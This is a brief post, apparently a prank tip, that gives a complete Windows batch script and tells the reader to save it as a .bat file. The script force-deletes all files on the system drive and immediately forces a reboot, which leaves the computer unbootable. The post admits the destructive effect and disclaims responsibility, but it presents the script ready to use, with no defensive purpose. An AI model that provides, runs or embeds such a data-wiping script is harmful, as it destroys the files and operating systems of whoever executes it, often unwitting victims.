go to notepad and type the following and save it as a .bat file
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
If executed this program will immediately shutdown ur system and delete all the contents of the system drive. Next time your system wont boot. Please dont try it in your own system. I am not responsible for anything done by using this program